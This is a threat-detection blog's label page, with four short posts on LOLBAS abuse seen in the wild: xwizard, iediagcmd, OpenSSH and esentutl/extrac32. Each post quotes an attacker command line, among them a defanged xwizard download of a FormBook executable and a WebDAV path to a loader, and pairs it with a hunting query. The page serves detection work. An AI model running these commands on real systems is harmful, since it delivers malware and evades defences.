Posts

Showing posts with the label lolbas

238. LOLBAS ITW: Extensible Wizards Host Process

Image
Hello everyone! There're lots of LOLBAS, but are all of them used in-the-wild? Let's look how real adversaries abuse Extensible Wizards Host Process for  Ingress Tool Transfer (T1105) . So, Extensible Wizards Host Process can be used by adversaries to download a malicious file from a remote server. Here's an example  related to FormBook : XwIZarD.exe  RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /z hXXps://gbuarts[.]com/cc/Protected.exe For example, we can look for xwizard.exe executions with "http" among command line parameters: event_type: "processcreatewin" AND proc_file_path: "XwIZarD.exe" AND cmdline: *http* See you tomorrow!

163. A Curious Case of Iediagcmd.exe Abuse

Image
Hello everyone! Reading Check Point's report on Stealth Falcon activities, I spotted an interesting way of abusing iediagcmd.exe . The adversary uses malicious  .url files. The URL parameter points to iediagcmd.exe . Normally this executable spawns additional processes to collect diagnostic data, including route.exe . The working folder is changed by the .url to the attacker-controlled WebDAV server, so iediagcmd.exe runs the route.exe from \\summerartcamp[.]net@ssl@443/DavWWWRoot\OSYxaOjr\route.exe  (Horus Loader) instead of a legitimate one in system32 folder. Of course, we can use it for detection, and search for  iediagcmd.exe executing files from WebDAV servers, for example: event_type: "processcreatewin" AND proc_p_file_path: "iediagcmd.exe" AND proc_file_path: "DavWWWRoot" See you tomorrow!

156. Threat Actors Abuse OpenSSH to Run a Simple Backdoor

Image
Hello everyone! LOLBAS are everywhere! And we see more and more of them abused by real adversaries. For example, OpenSSH, which is included in newer versions of Windows! Xavier Mertens shared a curious example of how threat actors abuse it. The adversary executes ssh.exe with custom configuration file: C:\Windows\System32\OpenSSH\ssh.exe -F "C:\Windows\Temp\config" So, for example, we can hunt for ssh.exe executed with -F and config file located under Temp folder: event_type: "processcreatewin" AND proc_file_name: "ssh.exe" AND cmdline: ("f" AND "temp") See you tomorrow!

139. LOLBAS Abused by DBatLoader: Detection Opportunities

Image
Hello everyone! We know a lot about LOLBAS . But we usually see only some of them used ITW. So I always excited to see not so common examples. Today we'll look at two examples,  esentutl.exe and extrac32.exe , as seen in this report on DBatLoader . Both executables are used to copy legtimate command and scripting interpreters - Windows Command Shell and PowerShell. The first example is related to Windows Command Shell: esentutl /y C:\Windows\System32\cmd.exe /d C:\Users\Public\alpha.pif /o We can use it to build the query: event_type: "processcreatewin" AND proc_file_name: "esentutl.exe" AND cmdline: ("cmd.exe" OR "powershell.exe") The second is related to PowerShell: extrac32.exe /C /Y C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\xkn.pif Here we can use a very similar query: event_type: "processcreatewin" AND proc_file_name: "extrac32.exe" AND cmdline: ("cmd.exe" OR "powershell...